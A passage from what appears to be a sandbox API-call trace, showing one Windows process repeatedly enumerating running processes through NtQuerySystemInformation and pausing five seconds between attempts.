FreeType=0x8000) returned 0x0 [0265.521] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 